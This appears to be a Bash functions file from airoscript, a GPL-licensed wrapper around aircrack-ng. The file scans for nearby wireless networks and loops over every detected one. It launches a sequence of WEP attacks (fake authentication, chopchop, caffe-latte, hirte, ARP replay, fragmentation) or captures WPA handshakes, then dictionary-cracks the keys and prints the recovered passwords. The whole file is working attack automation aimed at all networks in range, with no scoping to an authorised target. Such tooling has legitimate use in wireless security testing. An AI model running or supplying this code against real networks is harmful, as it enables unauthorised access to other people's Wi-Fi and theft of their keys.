# Autocrack functions file for airoscript.

# Copyright (C) 2011 David Francos Cuartero
#        This program is free software; you can redistribute it and/or
#        modify it under the terms of the GNU General Public License
#        as published by the Free Software Foundation; either version 2
#        of the License, or (at your option) any later version.

#        This program is distributed in the hope that it will be useful,
#        but WITHOUT ANY WARRANTY; without even the implied warranty of
#        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#        GNU General Public License for more details.

#        You should have received a copy of the GNU General Public License
#        along with this program; if not, write to the Free Software
#        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# FUCKING UNPOLISHED, but... it seems to work.

unknown(){
    #ap_array=`cat $DUMP_PATH/dump-02.csv | grep -a -n Station | awk -F : '{print $1}'`
    #head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv
    return
}

count_aps(){ a=($(wc -l $DUMP_PATH/dump-02.csv)); echo ${a[0]}; } # benchmarks shows this is a little more efficent than using cut.

doauto(){
    source $path/autopwn
    F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0
    autoscan_autopwn;
    #unknown;
    cat $DUMP_PATH/dump-01.csv|sed -e '1,/BSSID/ s/.*//' -e '/Station/,$ s/.*//'|tac > $DUMP_PATH/dump-02.csv 2>/dev/null
    filter_ssid
    MAX_TARGETS=$(count_aps);
    echo;
    attack_functions_wep=(wep_attacks_fakeauto wep_attacks_fakeinteractive wep_attacks_chopchop wep_attacks_caffelate wep_attacks_hirte wep_attacks_arpreplay_auto wep_attacks_arpreplay_interactive wep_attacks_fragmentation wep_attacks_chopchopclient wep_attacks_pskarp)
    attack_functions_wpa=(wpa_attacks_handshake)
    tag; warn "${mark}Networks detected $MAX_TARGETS"; sleep 1

    for i in `seq 1 $MAX_TARGETS`; do
        tag; warn "${mark}Trying to crack target $i"

        export AUTO=2; selectAp;  sleep 1
        export writekey="-l $DUMP_PATH/$Host_MAC.key"
        if [ "$Host_SSID" != "" ]; then autopwn; 
        else tag; warn "${mark}Couldn't find essid, next try"; fi
    done
    cleanautovars

    tag; warn ${mark}"Cracked networks:"
    for file in $DUMP_PATH/*.key; do
        echo "\t${mark}$file : `cat $file`"
    done
}

continue_autocrack(){
    [[ $options_autoconfigure ]] && { 
        check_function doexit || source $path/internal/exit; 
        configure; doexit; 
    } || {
    read -p "Press c to configure, q to quit, any key to continue" -s -n1 ans
    echo $ans; echo; echo
        [[ "$ans" == "c" ]] && { 
            check_function doexit || source $path/internal/exit; 
            configure; doexit; 
        }
        [[ $ans == "q" ]] && { 
            warn "${mark}Exiting..."
            check_function doexit || source $path/internal/exit; 
            doexit killme ;
        }
    }
}

autopwn(){
    check_function cleanp || source $path/internal/childs

    F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0; next=0; count=0
    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { attack_functions=${attack_functions_wpa[@]}; min_ivs=10; } || attack_functions=${attack_functions_wep}

    for i in ${attack_functions[@]}; do
        tag; echo "${mark}Attack $count. Using $i in $Host_MAC"
        { $i & cleanp & get_min_ivs; } &> /dev/null
        [[ "$Host_ENC" =~ (.*)WPA(.*) ]] || {  
            tag; warn "${mark}Needed ivs: $min_ivs"
        }

        while [ "1" ]; do 
            sleep 5 && {
                check_if_worked
                [[ $? == 0 ]] && { 
                    warn "${mark}Trying to crack network, we have enough ivs or handshakes.";
                    cleanautovars;

                    check_function Crack_with_dictionary_generator && {
                        Crack_with_dictionary_generator autocrack 
                    } || {
                        export wait_for_execute=1; AUTO=1; selectcracking 1; AUTO=0; export wait_for_execute=0;
                    }
                    cleanautovars;
                    [[ -e $DUMP_PATH/$Host_MAC.key ]] && warn "${mark}Network cracked, password is  `cat $DUMP_PATH/$Host_MAC.key`" || warn "${mark}Network NOT cracked. Something failed, if your enc is WPA probably key is not in your ~/.airoscript/wordlist.txt"

                    continue_autocrack
                 } || {
                    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && {  
                        specialwarn "\r${mark}Current Handshakes: $handshakes"  ;
                    } || {
                        specialwarn "\r${mark}Current IVS: `check_all_ivs`"  ;
                    }
                }
            }
        done
        count=$(( $count + 1 ))
    done

    cleanautovars
    clear=$oldclear;

}

check_all_ivs(){  awk "/^$Host_MAC/ { gsub(/,/, \"\", \$14); print \$14; }" ${DUMP_PATH}/${Host_MAC}-01.csv; }

get_min_ivs(){
    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && {  min_ivs=10; return; }

    check_function Crack_with_dictionary_generator && {
        Crack_with_dictionary_generator return_ivs; a=$?
    } || {
        a=255
    }
    [[ "$a" == 255 ]] && min_ivs=$autopwn_min_ivs || min_ivs=$a
}

check_if_handshake(){ 
    handshakes=$(awk '/handshake/ {gsub(/\(/, "", $5); print $5}' <( $AIRCRACK $DUMP_PATH/$Host_MAC-01.cap ) )
    [[ $handshakes == "" ]] && handshakes=0
    (( $handshakes > 0 )) && return 0 || return 1
}

check_if_worked(){
    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && {
        check_if_handshake && {
            tag; warn "${mark}Got WPA handshake ($handshakes eapol packets)"
            return 0
        } || {
            return 1;
        }
    } || {
        get_min_ivs;
        ivs=`check_all_ivs`; [[ $ivs == "" ]] && ivs=0;
        (( $ivs > $min_ivs )) && return 0 || return 1
    }
}
